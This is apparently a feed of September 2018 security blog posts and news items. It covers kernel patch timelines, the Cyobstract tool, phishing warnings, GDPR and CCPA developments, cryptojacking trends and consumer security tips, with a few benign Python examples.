Note that the patch becomes public after step 1, potentially allowing attackers to develop an exploit, but users are only protected after step 4.

In this case, the backports to the upstream-supported stable kernels 4.18, 4.14, 4.9 and 4.4 were published 2018-09-19, five days after the patch became public, at which point the distributions could pull in the patch.

Upstream stable kernel updates are published very frequently. For example, looking at the last few stable releases for the 4.14 stable kernel, which is the newest upstream longterm maintenance release:

4.14.72 on 2018-09-26
4.14.71 on 2018-09-19
4.14.70 on 2018-09-15
4.14.69 on 2018-09-09
4.14.68 on 2018-09-05
4.14.67 on 2018-08-24
4.14.66 on 2018-08-22

The 4.9 and 4.4 longterm maintenance kernels are updated similarly frequently; only the 3.16 longterm maintenance kernel has not received any updates between the most recent update on 2018-09-25 (3.16.58) and the previous one on 2018-06-16 (3.16.57).

However, Linux distributions often don't publish distribution kernel updates very frequently. For example, Debian stable ships a kernel based on 4.9, but as of 2018-09-26, this kernel was last updated 2018-08-21. Similarly, Ubuntu 16.04 ships a kernel that was last updated 2018-08-27. Android only ships security updates once a month. Therefore, when a security-critical fix is available in an upstream stable kernel, it can still take weeks before the fix is actually available to users - especially if the security impact is not announced publicly.

In this case, the security issue was announced on the oss-security mailing list on 2018-09-18, with a CVE allocation on 2018-09-19, making the need to ship new distribution kernels to users clearer. Still: As of 2018-09-26, both Debian and Ubuntu (in releases 16.04 and 18.04) track the bug as unfixed.

Fedora pushed an update to users on 2018-09-22.


Conclusion

This exploit shows how much impact the kernel configuration can have on how easy it is to write an exploit for a kernel bug. While simply turning on every security-related kernel configuration option is probably a bad idea, some of them - like the kernel.dmesg_restrict sysctl - seem to provide a reasonable tradeoff when enabled.

The fix timeline shows that the kernel's approach to handling severe security bugs is very efficient at quickly landing fixes in the git master tree, but leaves a window of exposure between the time an upstream fix is published and the time the fix actually becomes available to users - and this time window is sufficiently large that a kernel exploit could be written by an attacker in the meantime.

New SEI CERT Tool Extracts Artifacts from Free Text for Incident Report Analysis

This post is co-authored with Sam Perl.

The CERT Division of the Software Engineering Institute (SEI) at Carnegie Mellon University recently released the Cyobstract Python library as an open source tool. You can use it to quickly and efficiently extract artifacts from free text in a single report, from a collection of incident reports, from threat assessment summaries, or any other textual source.

Cybersecurity teams need to collect and process data from incident reports, blog posts, news feeds, threat reports, IT tickets, incident tickets, and more. Often incident analysts are looking for technical artifacts to help in their investigation of a threat and development of a mitigation. This activity is often done manually by cutting and pasting between sources and tools. Cyobstract helps extract key artifact values from any kind of text, allowing incident analysts to focus their attention on processing the data once it's extracted. Once artifact values are extracted, they can be more easily correlated across multiple datasets.

After Cyobstract extracts security-relevant data types, the data can be used for higher level downstream analysis and investigation of source incident reports and data. The resulting data can also be loaded into a database, such as an indicator database. Using Cyobstract, the extracted artifacts can be used to quickly and easily find commonality and similarity across reports, thereby potentially revealing patterns that might otherwise have remained hidden.

At its core, the Cyobstract library is built around a collection of robust regular expressions that target 24 specific security-relevant data types of potential interest, including the following:

  • IP addresses: IPv4, IPv4 CIDR, IPv4 range, IPv6, IPv6 CIDR, and IPv6 range
  • hashes: MD5, SHA1, SHA256, and ssdeep
  • Internet and system-related strings: FQDN, URL, user agent strings, email addresses, filenames, filepath, and registry keys
  • Internet infrastructure values: ASN, ASN owner, country, and ISP
  • security analysis values: CVE, malware, and attack type

Cyobstract is capable of extracting these artifacts even if they are malformed in some way. For example, in the incident response community, it's often standard practice for teams to "defang" indicators of compromise before storing them or sending them to another team. Defanged indicator values can be difficult for automated solutions to extract. There is no standard practice for defanging, so there are many ways it can be done. Cyobstract was built from a large collection of real incident reports from many organizations so it can handle many ways of defanging that CERT researchers have observed in the field.

In addition to the core extraction library, Cyobstract includes developer tools that teams can use to craft their own regular expressions and capture custom security data types. Analysts typically do this by using a list of names to extract; however, over time, that list can be large and slow to use in matching. Using Cyobstract, analysts can input their lists of terms to match (such as a list of common malware names) and get an optimized regex as output. This expression is significantly faster than trying to match directly to a name on a list.

The library also includes benchmarking tools that can track the effect of changes to regular expressions and present the analyst with feedback on the overall effectiveness of the individual change (e.g., this regex change found three more reports than the previous version).

The Cyobstract library can be downloaded from GitHub at

Google promises a fix for Chrome’s auto account-sign-in snafu, but you can stop it right now

Google’s Chrome 69 hides a disturbing twist: if you log into Gmail or another Google service, Chrome seems to automatically log you into the browser as well. Theoretically, that means that you will automatically begin sharing data with Google, like it or not.

The confusion comes from a new way in which Google shows your “logged in” status. Previously, if you were signed in to Chrome, an icon would appear in the upper right-hand corner, indicating that you were signed in and sharing data. The same icon now appears if you’re logged into a Google service like Gmail, but not necessarily to Chrome.

Update 9/26/18: Google has announced upcoming changes to the way Chrome 70 handles sign-ins to address this issue.


Don’t Hit Me Up – Application Security Weekly #33

This week, Keith and special guest host April Wright interview Ron Gula, Founder of Tenable and Gula Tech Adventures! They discuss security in the upcoming elections, how to maintain separation of duties, attack simulation, and more! In the Application Security News, Hackers stole customer credit cards in Newegg data breach, John Hancock now requires monitoring bracelets to buy insurance, the man who broke Ticketmaster, new security settings available in iOS 12, State Department confirms data breach exposed employee data, and more!


Full Show Notes:


Visit for all the latest episodes!


Visit https://www.activecountermeasures/asw to sign up for a demo or buy our AI Hunter!



Risky Business #515 — NSA staffer at centre of Kaspersky scandal jailed

This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

  • Former NSA staffer gets 66 months over incident at heart of Kaspersky scandal
  • Zoho has a very bad week
  • Telco lobby group raises some legit concerns over Australia’s “anti-encryption” legislation
  • Twitter API leaks DMs
  • Equifax fined by UK
  • Yubikey 5 enables passwordless Windows logins
  • Privacy International has an aneurism
  • NSS Labs launches antitrust suit against security software makers
  • MOAR

This week’s show is brought to you by Rapid7.

Jen Andre is this week’s sponsor guest. She was the founder of Komand, a security automation and orchestration company that became part of Rapid7 about midway through last year. I spoke to Jen a bit about how she came to start Komand and where the security automation and orchestration discipline is at right now.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes

Ex-NSA employee gets 5.5 years in prison for taking home classified info | ZDNet
Domain registrar oversteps taking down Zoho domain, impacts over 30Mil users | ZDNet
Peter Dutton to push through new security legislation as fears of "severely damaging" spyware murmur
Twitter API bug leaked private data to other accounts
Equifax fined maximum penalty under 1998 UK data protection law
The Series 5 YubiKey Will Help Kill the Password | WIRED
Press release: UK intelligence agency admits unlawfully spying on Privacy International | Privacy International
UK spooks fess up to snooping on Privacy International's private data
GCHQ's mass surveillance violates citizens' right to privacy, ECHR rules
NSS Labs files antitrust suit against multiple cybersecurity vendors
Hacking for ca$h | The Strategist
Operator of 'VirusTotal for criminals' gets 14-year prison sentence
Tencent engineer attending cybersecurity event fined for hotel WiFi hacking
Snyk gets $22 million for platform that tracks security flaws in open source projects
They Got 'Everything': Inside a Demo of NSO Group's Powerful iPhone Malware - Motherboard
Content Moderator Sues Facebook, Says Job Gave Her PTSD - Motherboard
Microsoft Rolls Out Confidential Computing for Azure
Cloudflare Improves Privacy by Encrypting the SNI During TLS Negotiation
This Windows file may be secretly hoarding your passwords and emails | ZDNet
Security researcher claims macOS Mojave privacy bug on launch day | TechCrunch
0Day Windows JET Database Vulnerability disclosed by Zero Day Initiative
Over 80 Cisco Products Affected by FragmentSmack DoS Bug
Cisco patches 'critical' credential bug in video surveillance software
Security Orchestration and Automation with InsightConnect | Rapid7
Security Orchestration and Automation for Security Operations | Rapid7

Netflix Users: Don’t Get Hooked by This Tricky Phishing Email

If you own a smart TV, or even just a computer, it’s likely you have a Netflix account. The streaming service is huge these days – even taking home awards for its owned content. So, it’s only natural cybercriminals are attempting to leverage the service’s popularity for their own gain. In fact, as discovered just last week, fake Netflix emails have been circulating, claiming there are issues with users’ accounts. But of course, there is no issue at all – only a phishing scam underway.

The headline in itself should be the first indicator of fraud, as it reads “Update your payment information!” The body of the fake email then claims that there’s an issue with a user’s account or that their account has been suspended. The email states that they need to update their account details in order to resolve the problem, but the link actually leads victims to a genuine-looking Netflix website designed to steal usernames and passwords, as well as payment details. If the victim updates their financial information, they are actually taken to the real Netflix home page, which gives this trick a sense of legitimacy.

In short – this phishing email scheme is convincing and tricky. That means it’s crucial all Netflix users take proactive steps now to protect themselves from this stealthy attack. To do just that, follow these tips:

  • Be careful what you click on. Be sure to only click on emails that you are sure came from a trusted source. If you don’t know the sender, or the email’s content doesn’t seem familiar, remain wary and avoid interacting with the message.
  • Go directly to the source. It’s a good security rule of thumb: when an email comes through requesting personal info, always go directly to the company’s website to be sure you’re working with the real deal. You should be able to check your account status on the Netflix website, and determine the legitimacy of the request from there. If anything is still in question, feel free to call their support line and ask about the notice that way as well.
  • Place a fraud alert. If you know your financial data has been compromised by this attack, be sure to place a fraud alert on your credit so that any new or recent requests undergo scrutiny. It’s important to note that this also entitles you to extra copies of your credit report so you can check for anything sketchy. And if you find an account you did not open, make sure you report it to the police or Federal Trade Commission, as well as the creditor involved so you can put an end to the fraudulent account.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

"metadata": {
"id": "8b4876aa-14b9-441d-a8b7-d62cc6a9e821",
"version": "1.0",
"ep": "ta",
"lang": "en-us",
"original-url": "",
"author": "Gary Davis",
"author-page": "",
"category": "Consumer Threat Notices",
"draft": "false",
"authordetail": "Gary Davis is Chief Consumer Security Evangelist. Through a consumer lens, he partners with internal teams to drive strategic alignment of products with the needs of the security space. Gary also provides security education to businesses and consumers by distilling complex security topics into actionable advice. Follow Gary Davis on Twitter at @garyjdavis",
"tinyimage": "",
"feedimageurl": "",
"pubDate": "Tue 25 Sept 2018 12:35:48 +0000"

The post Netflix Users: Don’t Get Hooked by This Tricky Phishing Email appeared first on McAfee Blogs.

Hack Naked News #190 – September 25, 2018

This week: WordPress sites backdoored with malicious code, Google’s forced sign-in to Chrome raises red flags, Newegg is victimized by Magecart malware, a woman hijacked CCTV cameras ahead of Trump’s inauguration, Bitcoin DDoS attacks, cybercriminals target Kodi for malware distribution, and a security researcher is fined for hacking hotel Wi-Fi. Jason Wood joins us for expert commentary on Google Chrome’s “dark pattern” of poor privacy changes, on this episode of Hack Naked News!



Understanding Your Kid’s Smart Gadgets

When people think about IoT devices, many think of those that fill their homes: smart lights, ovens, TVs, and so on. But there’s a whole other category of IoT device inside the home that parents may not be as cognizant of – children’s toys. In 2018, smartwatches, smart teddy bears, and more are all in kids’ hands. And though parents are happy to purchase the next hot item for their children, they aren’t always fully aware of how these devices can affect their child’s personal security. IoT has expanded to children, and it’s parents who need to understand how these toys affect their family, and what they can do to keep their children protected from an IoT-based cyberthreat.

People commonly adopt IoT devices for one reason: convenience. And that’s the same reason these devices have found their way into children’s hands as well. They’re convenient, engaging, easy-to-use toys, some of which are even used to help educate kids.

But this adoption has changed children’s online security. Now, instead of just limiting their device usage and screen time, parents have to start thinking about the types of threats that can emerge from their child’s interaction with IoT devices. For example, smartwatches have been used to track and record kids’ physical location. And children’s data is often recorded with these devices, which means their data could be potentially leveraged for malicious reasons if a cybercriminal breaches the organization behind a specific connected product or app. The FBI has even previously cautioned that these smart toys can be compromised by hackers.

Keeping connected kids safe  

Fortunately, there are many things parents can do to keep their connected kids safe. First off, do the homework. Before buying any connected toy or device for a kid, parents should look up the manufacturer first and see if they have security top of mind. If the device has had any issues with security in the past, it’s best to avoid purchasing it. Additionally, always read the fine print. Terms and conditions should outline how and when a company accesses a kid’s data. When buying a connected device or signing them up for an online service/app, always read the terms and conditions carefully in order to remain fully aware of the extent and impact of a kid’s online presence and use of connected devices.

Mind you, these IoT toys must connect to a home Wi-Fi network in order to run. If they’re vulnerable, they could expose a family’s home network as a result. Since it can be challenging to lock down all the IoT devices in a home, utilize a solution like McAfee Secure Home Platform to provide protection at the router-level. Also, parents can keep an eye on their kid’s online interactions by leveraging a parental control solution like McAfee Safe Family. They can know what their kids are up to, guard them from harm, and limit their screen time by setting rules and time limits for apps and websites.

To learn more about IoT devices and how your children use them, be sure to follow us at @McAfee and @McAfee_Home.

The post Understanding Your Kid’s Smart Gadgets appeared first on McAfee Blogs.

Double Shot – Business Security Weekly #100

This week, Michael is joined by April Wright to interview Scott King, Sr. Director of Strategic Advisory Services at Rapid7! In this two-part interview, Michael and April talk with Scott about transitioning into his role at Rapid7, ICS security, best practices for understanding how these systems work, holding accountability, and how legal and security share common goals!


Space Elevator Test

So cool!

STARS-Me (or Space Tethered Autonomous Robotic Satellite – Mini elevator), built by engineers at Shizuoka University in Japan, consists of two 10-centimeter cubic satellites connected by a 10-meter-long tether. A small robot representing an elevator car, about 3 centimeters across and 6 centimeters tall, will move up and down the cable using a motor as the experiment floats in space.

Via Science News, “Japan has launched a miniature space elevator,” and “the STARS project.”

CNIL Publishes Initial Assessment of GDPR Implementation

On September 25, 2018, the French Data Protection Authority (the “CNIL”) published the first results of its factual assessment of the implementation of the EU General Data Protection Regulation (GDPR) in France and in Europe. When making this assessment, the CNIL first recalled the current status of the French legal framework, and provided key figures on the implementation of the GDPR from the perspective of privacy experts, private individuals and EU supervisory authorities. The CNIL then announced that it will adopt new GDPR tools in the near future. Read the full factual assessment (in French).

Upcoming Consolidation of the French Legal Framework

The French Data Protection Act (“the Act”) and its implementing Decree were amended by a law and a Decree published on June 21 and August 3, 2018, respectively, in order to bring French law in line with the GDPR and implement the EU Data Protection Directive for Police and Criminal Justice Authorities. However, some provisions of the Act remain unchanged even though they are no longer applicable. In addition, the Act does not mention all of the new obligations imposed by the GDPR or the new rights of data subjects, and is therefore incomplete. The CNIL recalled that an ordinance is expected to be adopted by the end of this year to rewrite the Act and improve the readability of the French data protection framework.

Gradual Rolling Out of the GDPR by Privacy Experts

The CNIL noted that 24,500 organizations have appointed a data protection officer (“DPO”), representing 13,000 individual DPOs (a single DPO may serve several organizations). In comparison, only 5,000 DPOs were appointed under the previous data protection framework. Since May 25, 2018, the CNIL has also received approximately 7 data breach notifications a day, totaling more than 600 data breach notifications, which affected 15 million individuals. The CNIL continues to receive a large number of authorization requests in the health sector (more than 100 requests filed since May 25, 2018, in particular for clinical trial purposes).
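As a quick sanity check on those figures (the dates come from the text; the per-day rate is the CNIL’s approximation):

```python
from datetime import date

# Days between the GDPR's application date and the assessment's publication.
days = (date(2018, 9, 25) - date(2018, 5, 25)).days
print(days)      # 123
print(7 * days)  # 861 -- roughly 7 notifications/day is consistent with "more than 600"
```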

Individuals’ Unprecedented GDPR Awareness

Since May 25, 2018, the CNIL has received 3,767 complaints from individuals. This represents an increase of 64% compared to the number of complaints received during the same period in 2017, and can be explained by the widespread media coverage of the GDPR and cases such as Cambridge Analytica. EU supervisory authorities are currently handling more than 200 cross-border complaints under the cooperation procedure provided for by the GDPR, and the CNIL is a supervisory authority concerned for most of these cases.

Effective European Cooperation Under the GDPR

The CNIL recalled that a total of 18 GDPR guidelines have been adopted at the EU level and 7 guidelines are currently being drawn up by the European Data Protection Board (“EDPB”) (e.g., guidelines on the territorial scope of the GDPR, data transfers and video surveillance). Further, the IT platform chosen to support cooperation and consistency procedures under the GDPR has been effective since May 25, 2018. With respect to Data Protection Impact Assessments (“DPIAs”), the CNIL has submitted to the EDPB a list of processing operations requiring a DPIA. Once validated by the EDPB, this list and additional guidelines will be published by the CNIL.

Next Steps

In terms of the CNIL’s upcoming actions or initiatives, the CNIL announced that it will shortly propose the following new tools:

  • “Referentials” (i.e., guidelines) relating to the processing of personal data for HR and customer management purposes. These referentials are intended to update the CNIL’s well established doctrine in light of the new requirements of the GDPR. The draft referentials will be open for public consultation. Once finalized, the CNIL announced its intention to promote those referentials at the EU level.
  • A Model Regulation regarding biometric data. Under Article 9(4) of the GDPR, EU Member States may maintain and introduce further conditions, including limitations, with regard to the processing of biometric data. France introduced such conditions by amending the French Data Protection Act to allow the processing of biometric data for the purposes of controlling access to a company’s premises and/or to devices and apps used by staff members to perform their job duties, provided that the processing complies with the CNIL’s Model Regulation. Compliance with that Model Regulation constitutes an exception to the prohibition on processing biometric data.
  • A first certification procedure. In May 2018, the CNIL launched a public consultation on the certification of the DPO, which ended on June 22, 2018. The CNIL will finalize the referentials relating to the certification of the DPO by the end of this month.
  • Compliance packs. The CNIL confirmed that it will continue to adopt compliance packs, (i.e., guidelines for a particular sector or industry).  The CNIL also announced its intention to promote some of these compliance packs at the EU level (such as the compliance pack on connected vehicles) in order to develop a common European doctrine that could be endorsed by the EDPB.
  • Codes of conduct. A dozen codes of conduct are currently being prepared, in particular codes of conduct on medical research and cloud infrastructures.
  • A massive open online course. This course will help participants familiarize themselves with the fundamental principles of the GDPR.

California transparency legislation could improve access to police records for journalists and the public

WikiMedia Commons

In November 2014, James De La Rosa was shot and killed by Bakersfield police officers. He was unarmed and 22 years old. Following his death, his family desperately wanted answers. But in California, police misconduct records are generally not available to the public—limiting what the De La Rosa family was able to learn about the officers who killed James.

“One of the officers who was involved in James’s shooting has reportedly also been involved in seven other shootings, while another officer has reportedly been involved in another killing,” James De La Rosa’s mother Leticia said in a statement to the ACLU. “Yet state law shields their records and families like mine rarely get answers to the questions we ask. All we get is secrecy.”

Like Leticia De La Rosa, Theresa Smith had a son killed by California police officers. Caesar Cruz was shot in a Walmart parking lot—allegedly multiple times—by Anaheim police officers before dying in a hospital a half hour later. An attorney for Cruz’ family called his death a “police execution.”

But all that Cruz’ family was allowed to know about her son’s death was that five officers were involved, and it took Smith over a year and a half to determine the name of the officer who killed Caesar Cruz.

While police misconduct information is public record in many states, that’s not the case in California. Even when an officer is repeatedly accused of or disciplined for abuse, these records are considered part of an officer’s personnel file.

In the 1970s, Gov. Jerry Brown signed into law a measure that blocked public access to misconduct documents, and forced defendants to petition a judge to examine these records in private and decide if the information warranted disclosure. In 2006, the California Supreme Court ruled that police misconduct investigations are confidential, a ruling that has kept answers from families of people hurt by police violence, obscured critical information about public officials from journalists, and shielded police from scrutiny.

Leticia De La Rosa and Theresa Smith are both advocates for a California bill that could make police investigation and disciplinary records available to the public in particularly egregious instances of misconduct.

“This bill would require, notwithstanding any other law, certain peace officer or custodial officer personnel records and records relating to specified incidents, complaints, and investigations involving peace officers and custodial officers to be made available for public inspection pursuant to the California Public Records Act,” reads California State Senate Bill 1421.

If SB 1421, sponsored by Sen. Nancy Skinner (D-Berkeley), becomes law, these personnel records could be released to the public. Journalists would be able to more easily access information about incidents in which officers shoot, kill, or seriously injure someone, commit sexual assault or perjury, or lie in an investigation.

Some police labor unions have fought the bill fiercely. The California Sheriffs Association argued that the bill could jeopardize officer privacy and create a financial burden on local agencies. Los Angeles Times journalist Liam Dillon noted that the Los Angeles Police Protective League gave the maximum contribution allowable to a dozen Assembly Democrats as they considered the bill.

Despite opposition from police unions, Nikki Moore, legal counsel and legislative advocate at the California News Publishers Association, noted that the California Police Chiefs Association came out in support of the bill. “When they fire an officer and have evidence of misconduct, they can’t tell the public. They saw value in this transparency, and it’s a new perspective.”

SB 1421 has made it to the governor’s desk. It isn’t the only bill awaiting Jerry Brown’s signature that could improve access to police records. Assembly Bill 748 would require police departments to make body camera footage of most officer shootings and serious uses of force publicly available.

In a blog post, California Public Records Act attorney Anna von Herrmann wrote that the bill would open up critical access to records about egregious officer misconduct. “Given the enormous power that law enforcement agencies wield, from the power to arrest and detain individuals to the power to use lethal force, public access to this information could be a powerful tool to understanding and challenging law enforcement abuses.”

The impacts of both bills for transparency could be huge—for families like Cruz’ and De La Rosa’s, community organizers, and journalists reporting on police violence and abuse of power.

“Access to government records is a fundamental principle of democracy,” said Moore. “California, for so long, has denied access to these records, retaining complete discretion over disclosure. You have government agencies acting as editor.”

SB 1421 and AB 748 both await Governor Jerry Brown’s signature. He should sign them both.

CCPA Amendment Bill Signed Into Law

On September 23, 2018, California Governor Jerry Brown signed into law SB-1121 (the “Bill”), which makes limited substantive and technical amendments to the California Consumer Privacy Act of 2018 (“CCPA”). The Bill takes effect immediately and delays the California Attorney General’s enforcement of the CCPA until six months after publication of the Attorney General’s implementing regulations, or July 1, 2020, whichever comes first.

We have previously posted about the modest changes that SB-1121 makes to the CCPA. As reported in BNA Privacy Law Watch, the California legislature may consider broader substantive changes to the CCPA in 2019.

5 Simple But Powerful Career Tips

Getting ahead in your career doesn’t happen by accident. It requires planning and constant pursuit. That’s why working for a company that invests in you, truly wants you to succeed and enables you to grow personally and professionally makes a big difference in your career progression.

This week McAfee hosted our first-ever CMO Development Forum where our marketing and communications teams heard from leaders across the business, followed by breakout sessions for their own learning and development. As McAfee’s SVP and Chief Human Resources Officer, I was honored to speak to the team about my career journey and share lessons I learned along the way.

Whether you are just out the gate, or more experienced in your career, I hope my top five tips are helpful in your own career journey. Here’s what I shared:

1) Stay Hungry.

Whatever field or role you want to be in, the key is to be the best you can be and commit to staying the best. Understand your role and your industry, and if you don’t know something, use everything at your disposal to figure it out. And once you’re an expert in your field – make sure you’re also an expert in the business.

2) Celebrate Each Other’s Success.

There is enough room for everyone. I truly believe that. Maybe you missed out on a promotion, or a colleague was recognized and rewarded instead of you. Begrudging someone else’s success won’t get you anywhere. Instead, celebrate the success of others. Let’s lift each other up! And then use it as an opportunity to reflect or ask your leader what more you could have done. Find out what your development areas are to get you to the next level. Map out your future career path and show your manager you want it!

 3) Work Hard. Work Smart.

There’s no way around it – you have to work hard. But what distinguishes someone as a productive high-performer is when that person is working hard on the right things. You’ll find the task or project that has the biggest impact for your career and business is the one that requires the most focus. Start your day with those big, difficult jobs until you reach your goals. Relentlessly prioritize.

 4) Own Your Brand.

When someone says your name, what do they think? What values do they associate with you? Do people perceive you as self-centered or self-aware? Do they see you as a know-it-all or a fountain of knowledge? Are you a leader who motivates people, or just a manager who pushes people too hard? These traits are all similar, but how they are perceived by others makes a huge difference. Know the value you bring to the table. And in everything that you do, make sure your values shine through.

5) Take Pride in Everything You Do.

Martin Luther King Jr. said, “If it falls to your lot to be a street sweeper, sweep streets like Michelangelo painted pictures, sweep streets like Beethoven composed music … Sweep streets so well that all the host of heaven and earth will have to pause and say: Here lived a great street sweeper who swept his job well.” This is one of my favorite quotes. No matter how big or small, take care in your work. Your work, your actions, represent you, so make sure you’re proud of your work.

Looking to join a company that invests in you? McAfee is hiring!

The post 5 Simple But Powerful Career Tips appeared first on McAfee Blogs.

ICO Issues First Enforcement Action Under the GDPR

The Information Commissioner’s Office (“ICO”) in the UK has issued the first formal enforcement action under the EU General Data Protection Regulation (GDPR) and the UK Data Protection Act 2018 (the “DPA”) against Canadian data analytics firm AggregateIQ Data Services Ltd. (“AIQ”). The enforcement action, in the form of an Enforcement Notice served under section 149 of the DPA, requires AIQ to “cease processing any personal data of UK or EU citizens obtained from UK political organizations or otherwise for the purposes of data analytics, political campaigning or any other advertising purposes.”

AIQ uses data to target online advertisements at voters, and its clients include UK political organizations, in particular Vote Leave, BeLeave, Veterans for Britain and the DUP Vote to Leave. These organizations provide personal data to AIQ for the purposes of targeting individuals with political advertising messages on social media.

Although AIQ is not established in the EU, the ICO determined that because AIQ’s processing activities relate to the monitoring of data subjects’ behavior taking place within the EU, AIQ is subject to the GDPR under the territorial scope provisions of Article 3(2)(b).

AIQ was found to be in breach of Article 5(1)(a)–(c) and Article 6 of the GDPR for processing personal data in a way that data subjects were not aware of, for a purpose they would not have expected, and without a lawful basis for processing. In addition, AIQ failed to provide the transparency information required under Article 14 of the GDPR.

AIQ is challenging the ICO’s decision and has exercised its right of appeal to the First-tier Tribunal under section 162(1)(c) of the DPA.

‘McAfee Labs Threats Report’ Highlights Cryptojacking, Blockchain, Mobile Security Issues

As we look over some of the key issues from the newly released McAfee Labs Threats Report, we read terms such as voice assistant, blockchain, billing fraud, and cryptojacking. Although voice assistants fall in a different category, the other three are closely linked and driven by the goal of fast, profitable attacks that result in a quick return on a cybercriminal’s investment.

One of the most significant shifts we see is that cryptojacking is still on the rise, while traditional ransomware attacks—aka “shoot and pray they pay”—are decreasing. Ransomware attacks are becoming more targeted as actors conduct their research to pick likely victims, breach their networks, and launch the malware followed by a high-pressure demand to pay the ransom. Although the total number of ransomware samples has fallen for two quarters, one family continues to spawn new variants. The Scarab ransomware family, which entered the threat landscape in June 2017, developed a dozen new variants in Q2. These variants combined make up more than 50% of the total number of Scarab samples to date.

What sparked the movement toward cryptojacking, starting in fall 2017? The first reason is the value of cryptocurrency. If attackers can steal Bitcoins, for example, from a victim’s system, that alone is enough. If direct theft is not possible, why not mine coins using a large number of hijacked systems? There’s no need to pay for hardware, electricity, or CPU cycles; it’s an easy way for criminals to earn money. We once thought that CPUs in routers and video-recording devices were useless for mining, but default or missing passwords wipe away this view. If attackers can hijack enough systems, mining in high volume can be profitable. Individuals are not the only ones struggling to protect against these attacks; companies suffer from them as well.
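A back-of-the-envelope sketch makes the economics concrete. Every number below is an illustrative assumption (real hash rates and payout rates vary wildly); the point is only that revenue scales with fleet size while the attacker’s costs stay at zero:

```python
# All figures are illustrative assumptions, not measurements.
hashes_per_device = 50        # hashes/sec a weak hijacked CPU might manage (CPU-friendly PoW)
devices = 100_000             # size of the hijacked fleet
reward_per_gigahash = 0.15    # USD per 1e9 hashes, an assumed pool payout rate

total_hashes_per_day = hashes_per_device * devices * 86_400
revenue_per_day = total_hashes_per_day / 1e9 * reward_per_gigahash
cost_per_day = 0.0            # the attacker pays for no hardware, power, or CPU time

print(f"${revenue_per_day:,.2f} per day, at zero cost to the attacker")
```

Even modest per-device output becomes meaningful money at scale, which is why default or missing passwords on routers and recorders matter so much.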

Securing cloud environments can be a challenge. Building applications in the cloud with container technology is effective and fast, but we also need to apply the right security controls. We have seen breaches in which bad actors uploaded their own containers to a company’s cloud environment, where they began mining cryptocurrency.

New technologies and improvements to current ones are great, but we need to find the balance of securing them appropriately. Who would guess to use an embedded voice assistant to hack a computer? Who looks for potential attack vectors in new technologies and starts a dialog with the industry? One of those is the McAfee Advanced Threat Research team, which provides most of the analysis behind our threats reports. With a mix of the world’s best researchers in their key areas, they take on the challenge of making the (cyber) world safer. From testing vulnerabilities in new technologies to examining malware and the techniques of nation-state campaigns, we responsibly disclose our research to organizations and the industry. We take what we learn from analyzing attacks to evaluate, adapt, and innovate to improve our technology.

The post ‘McAfee Labs Threats Report’ Highlights Cryptojacking, Blockchain, Mobile Security Issues appeared first on McAfee Blogs.

5 Ways to Protect Your Finances Online

Financial companies continue to innovate with their online products and services, bringing conveniences for customers, but challenges when it comes to security.

This is because the current “fintech” (financial technology) landscape doesn’t include just traditional banks with online services. New players, like cryptocurrency sites, robo-advisors and online loan providers, have all joined the party. Regulations simply haven’t kept up, leaving security concerns up to the individual providers and the consumers who use them.

To deal with issues like protecting customers’ data, privacy, and transactions, today’s fintech companies often use a patchwork of security software and tools. A recent survey found that many major financial service providers use between 100 and 200 disparate security solutions[1]. And these solutions rarely share threat intelligence. This can leave security teams overwhelmed, and customer information more vulnerable to data leaks and hacking.

In fact, research released earlier this year revealed that hackers are using “hidden tunnels” in the infrastructure used to transmit data between financial applications to conceal theft. This means that breaches could go weeks or months without detection, all while customer information is exposed.

Underscoring the problem, the financial services industry was recently named the most targeted sector for cyber attacks for the second year in a row. And, cyber attacks reported to the Financial Conduct Authority grew 80% in the last year.

This isn’t hard to believe given that last year seven of the U.K.’s largest banks, including Santander and HSBC, were forced to reduce operations or shut down systems altogether after they were targeted in a coordinated denial-of-service (DoS) attack aimed at flooding servers with traffic.

Even though new regulations, like the European Union’s General Data Protection Regulation, are aimed at helping companies reduce security risks, and even fine them for privacy violations, there are still challenges when it comes to finding integrated solutions.

This means consumers have to be vigilant when it comes to protecting their money and information.

Here are 5 tips to protect your online finances:

  • Monitor your financial accounts & credit report—Regularly check your online bank statements and credit card accounts for any suspicious transactions. You’ll also want to review your credit scores once a quarter to make sure that no new accounts were opened in your name without your permission. Check to see if your bank or credit card company offers free credit monitoring. You might also consider investing in an identity protection service, since these often include credit monitoring and will even reimburse you in the case of identity fraud or theft.
  • Use multi-layered security and alerts—Take advantage of advanced security tools if your providers offer them, such as multi-factor authentication. (Multi-factor means you provide two or more pieces of information to verify your identity before you can log in to your account, such as typing a password and responding to a text message sent to your smartphone.) Also, many companies now offer free text or email alerts when a new charge is made, or when a change is made to any account information. Sign up for these to help monitor your accounts.
  • Do your homework—Before using a new financial service, make sure to research the company. Read other users’ reviews, and look into whether the company uses tools like encryption and multi-factor authentication to safeguard your data.
  • Don’t give away too much personal information—When we quickly sign up for accounts, sharing bank or identity information, we make it easy for the bad guys. Only share information that is absolutely necessary for the service you want to use.
  • Use comprehensive security—Just as fintech companies need to do their part, you have to do your part by using comprehensive security software. Make sure that all of your computers and devices are protected, including IoT devices. You may also want to look into new solutions that provide security at the network level.
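The multi-factor authentication mentioned above commonly uses time-based one-time passwords (TOTP, RFC 6238): your phone and the server derive the same short-lived code from a shared secret and the current time. A minimal sketch in Python, checked against the RFC’s published test vector:

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, for_time=None, digits: int = 6, step: int = 30) -> str:
    """Time-based one-time password per RFC 6238 (HMAC-SHA1 variant)."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(for_time if for_time is not None else time.time()) // step
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation: low nibble picks a 4-byte window
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)

# RFC 6238 test vector: secret "12345678901234567890", T=59 seconds, 8 digits.
print(totp("GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ", for_time=59, digits=8))  # "94287082"
```

Because the code changes every 30 seconds and never travels with the password, a phished password alone is not enough to log in, which is exactly why the tip recommends enabling it.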

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

